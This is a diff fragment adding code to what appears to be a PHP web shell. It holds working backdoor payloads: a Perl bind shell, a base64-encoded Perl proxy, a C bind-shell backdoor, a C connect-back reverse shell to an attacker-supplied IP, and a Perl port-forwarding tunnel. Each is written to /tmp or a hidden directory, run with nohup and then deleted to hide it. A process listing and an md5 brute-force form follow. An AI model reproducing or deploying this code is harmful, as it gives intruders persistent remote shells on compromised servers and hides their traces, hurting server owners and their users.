+listen(S,50);while(1){accept(X,S);if(!(\$pid=fork)){if(!defined \$pid){exit(0);}
+open STDIN,\"<&X\";open STDOUT,\">&X\";open STDERR,\">&X\";exec(\"/bin/sh -i\");
+close X;}}";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("nohup perl /tmp/nst_perl_bd.pl &");
+unlink("/tmp/nst_perl_bd.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_perl_bd.pl","w");
+fwrite($fp,"$perl_bd_scp");
+passthru("nohup perl .nst_bd_tmp/nst_perl_bd.pl &");
+unlink(".nst_bd_tmp/nst_perl_bd.pl");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_bd
+
+if($_POST['perl_proxy']){
+$port=$_POST['port'];
+$perl_proxy_scp = "IyEvdXNyL2Jpbi9wZXJsICANCiMhL3Vzci91c2MvcGVybC81LjAwNC9iaW4vcGVybA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtIGh0dHAgcHJveHkgc2VydmVyLiB6YXB1c2thamVtOiBwZXJsIHByb3h5LnBsCTgxODEgbHVib2ogcG9ydCB2aTZpIDEwMjQtDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KI3JlcXVpcmUgInN5cy9zb2NrZXQucGgiOw0KdXNlIFNvY2tldDsNCnNyYW5kICh0aW1lfHwkJCk7DQojLS0tICBEZWZpbmUgYSBmcmllbmRseSBleGl0IGhhbmRsZXINCiRTSUd7J0tJTEwnfSA9ICRTSUd7UVVJVH0gPSAkU0lHe0lOVH0gPSAnZXhpdF9oYW5kbGVyJzsNCnN1YiBleGl0X2hhbmRsZXIgew0KICAgIHByaW50ICJcblxuIC0tLSBQcm94eSBzZXJ2ZXIgaXMgZHlpbmcgLi4uXG5cbiI7DQogICAgY2xvc2UoU09DS0VUKTsNCiAgICBleGl0Ow0KDQp9DQojLS0tICBTZXR1cCBzb2NrZXQNCg0KJHwgPSAxOw0KJHByb3h5X3BvcnQgPSBzaGlmdChAQVJHVik7DQokcHJveHlfcG9ydCA9IDgxODEgdW5sZXNzICRwcm94eV9wb3J0ID1+IC9cZCsvOw0KDQokc29ja2V0X2Zvcm1hdCA9ICdTIG4gYTQgeDgnOw0KJmxpc3Rlbl90b19wb3J0KFNPQ0tFVCwgJHByb3h5X3BvcnQpOw0KJGxvY2FsX2hvc3QgPSBgaG9zdG5hbWVgOw0KY2hvcCgkbG9jYWxfaG9zdCk7DQokbG9jYWxfaG9zdF9pcCA9IChnZXRob3N0YnluYW1lKCRsb2NhbF9ob3N0KSlbNF07DQpwcmludCAiIC0tLSBQcm94eSBzZXJ2ZXIgcnVubmluZyBvbiAkbG9jYWxfaG9zdCBwb3J0OiAkcHJveHlfcG9ydCBcblxuIjsNCiMtLS0gIExvb3AgZm9yZXZlciB0YWtpbmcgcmVxdWVzdHMgYXMgdGhleSBjb21lDQp3aGlsZSAoMSkgew0KIy0tLSAgV2FpdCBmb3IgcmVxdWVzdA0KICAgIHByaW50ICIgLS0tIFdhaXRpbmcgdG8gYmUgb2Ygc2VydmljZSAuLi5cbiI7DQogICAgKCRhZGRyID0gYWNjZXB0KENISUxELFNPQ0tFVCkpIHx8IGRpZSAiYWNjZXB0ICQhIjsNCiAgICAoJHBvcnQsJGluZXRhZGRyKSA9ICh1bnBhY2soJHNvY2tldF9mb3JtYXQsJGFkZHIpKVsxLDJdOw0KICAgIEBpbmV0YWRkciA9IHVucGFjaygnQzQnLCRpbmV0YWRkcik7DQogICAgcHJpbnQgIkNvbm5lY3Rpb24gZnJvbSAiLCBqb2luKCIuIiwgQGluZXRhZGRyKSwgIiAgcG9ydDogJHBvcnQgXG4iOw0KIy0tLSAgRm9yayBhIHN1YnByb2Nlc3MgdG8gaGFuZGxlIHJlcXVlc3QuDQojLS0tICBQYXJlbnQgcHJvY2VzIGNvbnRpbnVlcyBsaXN0ZW5pbmcuDQogICAgaWYgKGZvcmspIHsNCgl3YWl0OwkJIyBGb3Igbm93IHdlIHdhaXQgZm9yIHRoZSBjaGlsZCB0byBmaW5pc2gNCgluZXh0OwkJIyBXZSB3YWl0IHNvIHRoYXQgcHJpbnRvdXRzIGRvbid0IG1peA0KICAgIH0NCiMtLS0gIFJlYWQgZmlyc3QgbGluZSBvZiByZXF1ZXN0IGFuZCBhbmFseXplIGl0Lg0KIy0tLSAgUmV0dXJuIGFuZCBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QgbWV0aG9kLg0KICAgKCRmaXJzdCwkbWV0aG9kKSA9ICZhbmFseXplX3JlcXVlc3Q7DQojLS0tICBTZW5kIHJlcXVlc3QgdG8gcmVtb3RlIGhvc3QNCiAgICBwcmludCBVUkwgJGZpcnN0Ow0KICAgIHByaW50ICRmaXJzdDsNCiAgICB3aGlsZSAoPENISUxEPikgew0KCXByaW50ICRfOw0KCW5leHQgaWYgKC9Qcm94eS1Db25uZWN0aW9uOi8pOw0KCXByaW50IFVSTCAkXzsNCglsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvKTsNCiAgICB9DQogICAgaWYgKCRtZXRob2QgZXEgIlBPU1QiKSB7DQoJJGRhdGEgPSA8Q0hJTEQ+Ow0KCXByaW50ICRkYXRhOw0KCXByaW50IFVSTCAkZGF0YTsNCiAgICB9DQogICAgcHJpbnQgVVJMICJcbiI7DQojLS0tICBXYWl0IGZvciByZXNwb25zZSBhbmQgdHJhbnNmZXIgaXQgdG8gcmVxdWVzdG9yLg0KICAgIHByaW50ICIgLS0tIERvbmUgc2VuZGluZy4gUmVzcG9uc2U6IFxuXG4iOw0KICAgICRoZWFkZXIgPSAxOw0KICAgICR0ZXh0ID0gMDsNCiAgICB3aGlsZSAoPFVSTD4pIHsNCglwcmludCBDSElMRCAkXzsNCglpZiAoJGhlYWRlciB8fCAkdGV4dCkgewkgICAgICMgT25seSBwcmludCBoZWFkZXIgJiB0ZXh0IGxpbmVzIHRvIFNURE9VVA0KCSAgICBwcmludCAkXzsNCgkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15bXHNceDAwXSokLykgew0KCQkkaGVhZGVyID0gMDsNCgkgICAgfQ0KIwkgICAgaWYgKCRoZWFkZXIgJiYgJF8gPX4gL15Db250ZW50LXR5cGU6IHRleHQvKSB7DQojCQkkdGV4dCA9IDE7DQojCSAgICB9DQoJfQ0KICAgIH0NCiAgICBjbG9zZShVUkwpOw0KICAgIGNsb3NlKENISUxEKTsNCiAgICBleGl0OwkJCSMgRXhpdCBmcm9tIGNoaWxkIHByb2Nlc3MNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojLS0JYW5hbHl6ZV9yZXF1ZXN0CQkJCQkJCS0tDQojLS0JCQkJCQkJCQktLQ0KIy0tCUFuYWx5emUgYSBuZXcgcmVxdWVzdC4gIEZpcnN0IHJlYWQgaW4gZmlyc3QgbGluZSBvZiByZXF1ZXN0LgktLQ0KIy0tCVJlYWQgVVJMIGZyb20gaXQsIHByb2Nlc3MgVVJMIGFuZCBvcGVuIGNvbm5lY3Rpb24uCQktLQ0KIy0tCVJldHVybiBhbiBlZGl0ZWQgdmVyc2lvbiBvZiB0aGUgZmlyc3QgbGluZSBhbmQgdGhlIHJlcXVlc3QJLS0NCiMtLQltZXRob2QuCQkJCQkJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBhbmFseXplX3JlcXVlc3Qgew0KIy0tLSAgUmVhZCBmaXJzdCBsaW5lIG9mIEhUVFAgcmVxdWVzdA0KICAgICRmaXJzdCA9IDxDSElMRD47DQoNCiAgICAkdXJsID0gKCRmaXJzdCA9fiBtfChodHRwOi8vXFMrKXwpWzBdOw0KICAgIHByaW50ICJSZXF1ZXN0IGZvciBVUkw6ICAkdXJsIFxuIjsNCg0KIy0tLSAgQ2hlY2sgaWYgZmlyc3QgbGluZSBpcyBvZiB0aGUgZm9ybSBHRVQgaHR0cDovL2hvc3QtbmFtZSAuLi4NCiAgICAoJG1ldGhvZCwgJHJlbW90ZV9ob3N0LCAkcmVtb3RlX3BvcnQpID0gDQoJKCRmaXJzdCA9fiBtIShHRVR8UE9TVHxIRUFEKSBodHRwOi8vKFteLzpdKyk6PyhcZCopISApOw0KIy0tLSAgSWYgbm90LCBiYWQgcmVxdWVzdC4NCiAgICANCiAgICBpZiAoISRyZW1vdGVfaG9zdCkgew0KCXByaW50ICRmaXJzdDsNCgl3aGlsZSAoPENISUxEPikgew0KCSAgICBwcmludCAkXzsNCgkgICAgbGFzdCBpZiAoJF8gPX4gL15bXHNceDAwXSokLyk7DQoJfQ0KCXByaW50ICJJbnZhbGlkIEhUVFAgcmVxdWVzdCBmcm9tICIsIGpvaW4oIi4iLCBAaW5ldGFkZHIpLCAiXG4iOw0KIwlwcmludCBDSElMRCAiQ29udGVudC10eXBlOiB0ZXh0L3BsYWluIiwiXG5cbiI7DQoJcHJpbnQgQ0hJTEQgIkkgZG9uJ3QgdW5kZXJzdGFuZCB5b3VyIHJlcXVlc3QuXG4iOw0KCWNsb3NlKENISUxEKTsNCglleGl0Ow0KICAgIH0NCiMtLS0gIElmIHJlcXVlc3RlZCBVUkwgaXMgdGhlIHByb3h5IHNlcnZlciB0aGVuIGlnbm9yZSByZXF1ZXN0DQogICAgJHJlbW90ZV9pcCA9IChnZXRob3N0YnluYW1lKCRyZW1vdGVfaG9zdCkpWzRdOw0KICAgIGlmICgoJHJlbW90ZV9pcCBlcSAkbG9jYWxfaG9zdF9pcCkgJiYgKCRyZW1vdGVfcG9ydCBlcSAkcHJveHlfcG9ydCkpIHsNCglwcmludCAkZmlyc3Q7DQoJd2hpbGUgKDxDSElMRD4pIHsNCgkgICAgcHJpbnQgJF87DQoJICAgIGxhc3QgaWYgKCRfID1+IC9eW1xzXHgwMF0qJC8pOw0KCX0NCglwcmludCAiIC0tLSBDb25uZWN0aW9uIHRvIHByb3h5IHNlcnZlciBpZ25vcmVkLlxuIjsNCiMJcHJpbnQgQ0hJTEQgIkNvbnRlbnQtdHlwZTogdGV4dC9wbGFpbiIsIlxuXG4iOw0KCXByaW50IENISUxEICJJdCdzIG5vdCBuaWNlIHRvIG1ha2UgbWUgbG9vcCBvbiBteXNlbGYhLlxuIjsNCgljbG9zZShDSElMRCk7DQoJZXhpdDsNCiAgICB9DQojLS0tICBTZXR1cCBjb25uZWN0aW9uIHRvIHRhcmdldCBob3N0IGFuZCBzZW5kIHJlcXVlc3QNCiAgICAkcmVtb3RlX3BvcnQgPSAiaHR0cCIgdW5sZXNzICgkcmVtb3RlX3BvcnQpOw0KICAgICZvcGVuX2Nvbm5lY3Rpb24oVVJMLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7DQojLS0tICBSZW1vdmUgcmVtb3RlIGhvc3RuYW1lIGZyb20gVVJMDQogICAgICAgICRmaXJzdCA9fiBzL2h0dHA6XC9cL1teXC9dKy8vOw0KICAgICgkZmlyc3QsICRtZXRob2QpOw0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMtLQlsaXN0ZW5fdG9fcG9ydChTT0NLRVQsICRwb3J0KQkJCQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgbGlzdGVucyB0byBhIHNwZWNpZmljIHBvcnQJCQktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBsaXN0ZW5fdG9fcG9ydCB7DQogICAgbG9jYWwgKCRwb3J0KSA9ICRfWzFdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIsICRtYXhfcmVxdWVzdHMpOw0KICAgICRtYXhfcmVxdWVzdHMgPSAzOwkJIyBNYXggbnVtYmVyIG9mIG91dHN0YW5kaW5nIHJlcXVlc3RzDQogICAgJHNvY2tldF9mb3JtYXQgPSAnUyBuIGE0IHg4JzsNCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcGFja2VkX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICJcMFwwXDBcMCIpOw0KICAgIHNvY2tldCgkX1swXSwgJlBGX0lORVQsICZTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUgInNvY2tldDogJCEiOw0KICAgIGJpbmQoJF9bMF0sICRwYWNrZWRfcG9ydCkgfHwgZGllICJiaW5kOiAkISI7DQogICAgbGlzdGVuKCRfWzBdLCAkbWF4X3JlcXVlc3RzKSB8fCBkaWUgImxpc3RlbjogJCEiOw0KICAgICRjdXIgPSBzZWxlY3QoJF9bMF0pOyAgDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQogICAgfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIy0tCW9wZW5fY29ubmVjdGlvbihTT0NLRVQsICRyZW1vdGVfaG9zdG5hbWUsICRwb3J0KQkJLS0NCiMtLQkJCQkJCQkJCS0tDQojLS0JQ3JlYXRlIGEgc29ja2V0IHRoYXQgY29ubmVjdHMgdG8gYSBjZXJ0YWluIGhvc3QJCQktLQ0KIy0tCSRsb2NhbF9ob3N0X2lwIGlzIGFzc3VtZWQgdG8gYmUgbG9jYWwgaG9zdG5hbWUgSVAgYWRkcmVzcwktLQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBvcGVuX2Nvbm5lY3Rpb24gew0KICAgIGxvY2FsICgkcmVtb3RlX2hvc3RuYW1lLCAkcG9ydCkgPSBAX1sxLDJdOw0KICAgIGxvY2FsICgkc29ja2V0X2Zvcm1hdCwgJHByb3RvLCAkcGFja2VkX3BvcnQsICRjdXIpOw0KICAgIGxvY2FsICgkcmVtb3RlX2FkZHIsIEByZW1vdGVfaXAsICRyZW1vdGVfaXApOw0KICAgIGxvY2FsICgkbG9jYWxfcG9ydCwgJHJlbW90ZV9wb3J0KTsNCiAgICBpZiAoJHBvcnQgIX4gL15cZCskLykgew0KCSRwb3J0ID0gKGdldHNlcnZieW5hbWUoJHBvcnQsICJ0Y3AiKSlbMl07DQoJJHBvcnQgPSA2NjY3IHVubGVzcyAoJHBvcnQpOw0KICAgIH0NCiAgICAkcHJvdG8gPSAoZ2V0cHJvdG9ieW5hbWUoJ3RjcCcpKVsyXTsNCiAgICAkcmVtb3RlX2FkZHIgPSAoZ2V0aG9zdGJ5bmFtZSgkcmVtb3RlX2hvc3RuYW1lKSlbNF07DQogICAgaWYgKCEkcmVtb3RlX2FkZHIpIHsNCglkaWUgIlVua25vd24gaG9zdDogJHJlbW90ZV9ob3N0bmFtZSI7DQogICAgfQ0KDQogICAgQHJlbW90ZV9pcCA9IHVucGFjaygiQzQiLCAkcmVtb3RlX2FkZHIpOw0KICAgICRyZW1vdGVfaXAgPSBqb2luKCIuIiwgQHJlbW90ZV9pcCk7DQogICAgcHJpbnQgIkNvbm5lY3RpbmcgdG8gJHJlbW90ZV9pcCBwb3J0ICRwb3J0LlxuXG4iOw0KICAgICRzb2NrZXRfZm9ybWF0ID0gJ1MgbiBhNCB4OCc7DQogICAgJGxvY2FsX3BvcnQgID0gcGFjaygkc29ja2V0X2Zvcm1hdCwgJkFGX0lORVQsIDAsICRsb2NhbF9ob3N0X2lwKTsNCiAgICAkcmVtb3RlX3BvcnQgPSBwYWNrKCRzb2NrZXRfZm9ybWF0LCAmQUZfSU5FVCwgJHBvcnQsICRyZW1vdGVfYWRkcik7DQogICAgc29ja2V0KCRfWzBdLCAmQUZfSU5FVCwgJlNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSAic29ja2V0OiAkISI7DQogICAgYmluZCgkX1swXSwgJGxvY2FsX3BvcnQpIHx8IGRpZSAiYmluZDogJCEiOw0KICAgIGNvbm5lY3QoJF9bMF0sICRyZW1vdGVfcG9ydCkgfHwgZGllICJzb2NrZXQ6ICQhIjsNCiAgICAkY3VyID0gc2VsZWN0KCRfWzBdKTsgIA0KDQogICAgJHwgPSAxOwkJCQkjIERpc2FibGUgYnVmZmVyaW5nIG9uIHNvY2tldC4NCiAgICBzZWxlY3QoJGN1cik7DQp9DQoNCg==";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("nohup perl /tmp/nst_perl_proxy.pl $port &");
+unlink("/tmp/nst_perl_proxy.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_proxy_tmp");
+$fp=fopen(".nst_proxy_tmp/nst_perl_proxy.pl","w");
+fwrite($fp,base64_decode($perl_proxy_scp));
+passthru("nohup perl .nst_proxy_tmp/nst_perl_proxy.pl $port &");
+unlink(".nst_proxy_tmp/nst_perl_proxy.pl");
+rmdir(".nst_proxy_tmp");
+}
+}
+$show_ps="1";
+}#end of start perl_proxy
+
+if($_POST['c_bd']){
+$port=$_POST['port'];
+$c_bd_scp = "#define PORT $port
+#include <stdio.h>
+#include <signal.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+
+int soc_des, soc_cli, soc_rc, soc_len, server_pid, cli_pid;
+struct sockaddr_in serv_addr;
+struct sockaddr_in client_addr;
+
+int main ()
+{
+    soc_des = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+    if (soc_des == -1)
+        exit(-1);
+    bzero((char *) &serv_addr, sizeof(serv_addr));
+    serv_addr.sin_family = AF_INET;
+    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
+    serv_addr.sin_port = htons(PORT);
+    soc_rc = bind(soc_des, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
+    if (soc_rc != 0)
+        exit(-1);
+    if (fork() != 0)
+        exit(0);
+    setpgrp();
+    signal(SIGHUP, SIG_IGN);
+    if (fork() != 0)
+        exit(0);
+    soc_rc = listen(soc_des, 5);
+    if (soc_rc != 0)
+        exit(0);
+    while (1) {
+        soc_len = sizeof(client_addr);
+        soc_cli = accept(soc_des, (struct sockaddr *) &client_addr, &soc_len);
+        if (soc_cli < 0)
+            exit(0);
+        cli_pid = getpid();
+        server_pid = fork();
+        if (server_pid != 0) {
+            dup2(soc_cli,0);
+            dup2(soc_cli,1);
+            dup2(soc_cli,2);
+            execl(\"/bin/sh\",\"sh\",(char *)0);
+            close(soc_cli);
+            exit(0);
+        }
+    close(soc_cli);
+    }
+}
+
+";
+
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc /tmp/nst_c_bd.c -o /tmp/nst_bd");
+passthru("nohup /tmp/nst_bd &");
+unlink("/tmp/nst_c_bd.c");
+unlink("/tmp/nst_bd");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bd_tmp");
+$fp=fopen(".nst_bd_tmp/nst_c_bd.c","w");
+fwrite($fp,"$c_bd_scp");
+passthru("gcc .nst_bd_tmp/nst_c_bd.c -o .nst_bd_tmp/nst_bd");
+passthru("nohup .nst_bd_tmp/nst_bd &");
+unlink(".nst_bd_tmp/nst_bd");
+unlink(".nst_bd_tmp/nst_c_bd.c");
+rmdir(".nst_bd_tmp");
+}
+}
+$show_ps="1";
+}#end of c bd
+
+
+if($_POST['bc_c']){ # nc -l -p 4500
+$port_c = $_POST['port_c'];
+$ip=$_POST['ip'];
+$bc_c_scp = "#include <stdio.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+#include <netinet/in.h>
+#include <netdb.h>
+
+int fd, sock;
+int port = $port_c;
+struct sockaddr_in addr;
+
+char mesg[]  = \"::Connect-Back Backdoor:: CMD: \";
+char shell[] = \"/bin/sh\";
+
+int main(int argc, char *argv[]) {
+        while(argc<2) {
+        fprintf(stderr, \" %s <ip> \", argv[0]);
+        exit(0); }
+
+addr.sin_family = AF_INET;
+addr.sin_port = htons(port);
+addr.sin_addr.s_addr = inet_addr(argv[1]);
+fd = socket(AF_INET, SOCK_STREAM, 0);
+connect(fd, (struct sockaddr*)&addr, sizeof(addr));
+
+send(fd, mesg, sizeof(mesg), 0);
+
+dup2(fd, 0);
+dup2(fd, 1);
+dup2(fd, 2);
+execl(shell, \"in.telnetd\", 0);
+
+close(fd);
+return 1;
+}
+
+";
+
+if(is_writable("/tmp")){
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc_c.c");}
+if(file_exists("/tmp/nst_c_bc_c.c")){unlink("/tmp/nst_c_bc");}
+$fp=fopen("/tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc /tmp/nst_c_bc_c.c -o /tmp/nst_bc_c");
+passthru("nohup /tmp/nst_bc_c $ip &");
+unlink("/tmp/nst_bc_c");
+unlink("/tmp/nst_bc_c.c");
+}else{
+if(is_writable(".")){
+mkdir(".nst_bc_c_tmp");
+$fp=fopen(".nst_bc_c_tmp/nst_c_bc_c.c","w");
+$bd_c_scp=str_replace("!n","\n",$bd_c_scp);
+fwrite($fp,"$bc_c_scp");
+passthru("gcc .nst_bc_c_tmp/nst_c_bc_c.c -o .nst_bc_c_tmp/nst_bc_c");
+passthru("nohup .nst_bc_c_tmp/nst_bc_c $ip &");
+unlink(".nst_bc_c_tmp/nst_bc_c.c");
+unlink(".nst_bc_c_tmp/nst_bc_c");
+rmdir(".nst_bc_c_tmp");
+}
+}
+$show_ps="1";
+
+}#end of back connect C
+
+
+if($_POST['datapipe_pl']){
+$port_2=$_POST['port_2'];
+$port_3=$_POST['port_3'];
+$ip=$_POST['ip'];
+$datapipe_pl = "
+#!/usr/bin/perl
+# coded by CuTTer (rus hacker)
+use IO::Socket;
+use POSIX;
+
+\$localport=$port_2;
+\$host=\"$ip\";
+\$port=$port_3;
+
+\$daemon=1;
+
+\$DIR = undef;
+
+## Âûâîäèòü ëîã ñîáûòèé (1-äà, 0-íåò)
+\$log=0;
+
+
+
+
+\$| = 1;
+
+if (\$daemon){
+        print \"3anycKaeM daemon\n\";
+
+        \$pid = fork;
+        exit if \$pid;
+        die \"Couldn't fork: \$!\" unless defined(\$pid);
+        POSIX::setsid() or die \"Can't start a new session: \$!\";
+}
+
+%o = ('port' => \$localport,
+          'toport' => \$port,
+          'tohost' => \$host);
+
+\$ah = IO::Socket::INET->new(
+                         'LocalPort' => \$localport,
+                         'Reuse' => 1,
+                         'Listen' => 10)
+    || die \"Íåëüçÿ îòêðûòü ñîêåò äëÿ ñîåäèíåíèé: \$!\";
+
+print \"Íà÷èíàåì âûïîëíåíèÿ öèêëà.\n\" if \$log;
+\$SIG{'CHLD'} = 'IGNORE';
+\$num = 0;
+while (1) {
+        \$ch = \$ah->accept();
+        if (!\$ch) {
+                print STDERR \"Ïðåðâàíî âûïîëåíèå accept: \$!\n\";
+                next;
+        }
+
+        printf(\"Íîâûé êëèåíò: host %s, port %s.\n\",
+        \$ch->peerhost(), \$ch->peerport()) if \$log;
+        ++\$num;
+        \$pid = fork();
+        if (!defined(\$pid)) {
+                print STDERR \"Íåâîçìîæíî âûïîëíèòü fork: \$!\n\";
+    } elsif (\$pid == 0) {
+## Íîâûé ïðîöåññ
+                \$ah->close();
+                Run(\%o, \$ch, \$num);
+        } else {
+                print \"Parent: Fork ïðîøåë óñïåøíî, çàêðûâàåì ñîêåò.\n\" if \$log;
+                \$ch->close();
+        }
+}
+
+
+sub Run {
+        my(\$o, \$ch, \$num) = @_;
+        my \$th = IO::Socket::INET->new('PeerAddr' => \$o->{'tohost'},
+                                                        'PeerPort' => \$o->{'toport'});
+        print(\"Child: Äåëàåì ðåäèðåêò íà \$o->{'tohost'}, ïîðò \$o->{'toport'}.\n\") if \$log;
+        if (!\$th) {
+                printf STDERR (\"Child: Ïðåðâàí ðåäèðåêò íà %s, ïîðò %s.\n\",
+                \$o->{'tohost'}, \$o->{'toport'});
+                exit 0;
+        }
+
+        my \$fh;
+        if (\$o->{'dir'}) {
+                \$fh = Symbol::gensym();
+                open(\$fh, \">\$o->{'dir'}/tunnel\$num.log\")
+                or die \"Child: Ïðåðâàíî ñîçäàíèå ëîã ôàéëà \$o->{'dir'}/tunnel\$num.log: \$!\";
+        }
+
+        \$ch->autoflush();
+        \$th->autoflush();
+        while (\$ch || \$th) {
+                print \"Child: Âêëþ÷àåì öèêë.\n\" if \$log;
+                my \$rin = \"\";
+                vec(\$rin, fileno(\$ch), 1) = 1 if \$ch;
+                vec(\$rin, fileno(\$th), 1) = 1 if \$th;
+                my(\$rout, \$eout);
+                select(\$rout = \$rin, undef, \$eout = \$rin, 120);
+                if (!\$rout  &&  !\$eout) {
+                        print STDERR \"Child: Îøèáêà Timeout.\n\";
+                }
+                my \$cbuffer = \"\";
+                my \$tbuffer = \"\";
+
+                if (\$ch && (vec(\$eout, fileno(\$ch), 1) || vec(\$rout, fileno(\$ch), 1))) {
+                        print \"Child: Æäåì äàííûõ îò êëèåíòà.\n\" if \$log;
+                        my \$result = sysread(\$ch, \$tbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: Îøèáêà ïðè ñ÷èòûâàíèè äàííûõ êëèåíòà: \$!\n\";
+                                exit 0;
+                        }
+                        if (\$result == 0) {
+                                print \"Child: Êëèåíò îòñîåäèíèëñÿ.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
+                }
+
+                if (\$th  &&  (vec(\$eout, fileno(\$th), 1)  || vec(\$rout, fileno(\$th), 1))) {
+                        print \"Child: Æäåì äàííûõ.\n\" if \$log;
+                        my \$result = sysread(\$th, \$cbuffer, 1024);
+                        if (!defined(\$result)) {
+                                print STDERR \"Child: Íåâîçìîæíî ñ÷èòàòü äàííûå: \$!\n\";
+                                exit 0;
+                        }
+
+                        if (\$result == 0) {
+                                print \"Child: Ïðîèçîøëî îòñîåäèíåíèå.\n\" if \$log;
+                                exit 0;
+                        }
+
+                        print \"Child: Äàííûå: \$cbuffer\n\" if \$log;
+            }
+
+                if (\$fh  &&  \$tbuffer) {
+                        (print \$fh \$tbuffer);
+                }
+
+                while (my \$len = length(\$tbuffer)) {
+                        print \"Child: Îòïðàâëÿåì \$len áàéò.\n\" if \$log;
+                        my \$res = syswrite(\$th, \$tbuffer, \$len);
+                        print \"Child: Äàííûå îòïðàâëåíû.\n\" if \$log;
+                        if (\$res > 0) {
+                                \$tbuffer = substr(\$tbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: Íåâîçìîæíî îòïðàâèòü äàííûå: \$!\n\";
+                        }
+                }
+
+                while (my \$len = length(\$cbuffer)) {
+                        print \"Child: Îòïðàâëÿåì \$len áàéò êëèåíòó.\n\" if \$log;
+                        my \$res = syswrite(\$ch, \$cbuffer, \$len);
+                        print \"Child: Äàííûå îòïðàâëåíû..\n\" if \$log;
+                        if (\$res > 0) {
+                                \$cbuffer = substr(\$cbuffer, \$res);
+                        } else {
+                                print STDERR \"Child: Íåâîçìîæíî îòïðàâèòü äàííûå: \$!\n\";
+                        }
+                }
+        }
+}
+
+";
+
+if(is_writable("/tmp")){
+$fp=fopen("/tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("nohup perl /tmp/nst_perl_datapipe.pl &");
+unlink("/tmp/nst_perl_datapipe.pl");
+}else{
+if(is_writable(".")){
+mkdir(".nst_datapipe_tmp");
+$fp=fopen(".nst_datapipe_tmp/nst_perl_datapipe.pl","w");
+fwrite($fp,"$datapipe_pl");
+passthru("nohup perl .nst_datapipe_tmp/nst_perl_datapipe.pl &");
+unlink(".nst_datapipe_tmp/nst_perl_datapipe.pl");
+rmdir(".nst_datapipe_tmp");
+}
+}
+$show_ps="1";
+
+}#end of datapipe perl
+
+
+
+
+
+if($show_ps=="1"){
+print "<center><b>[ps ux]</b></center><br><br>";
+print "<pre>";
+passthru("ps ux");
+print "</pre><br><br>";
+}
+
+
+
+echo "<form method=post><b>md5:</b><br><input name=md5 size=30>
+<Br>
+md5 online encoder/decoder (brutforce) (php) - [<a href=http://nst.void.ru/?q=releases&download=4>DOWNLOAD</a>]
+</form>
+";
+@$md5=@$_POST['md5'];
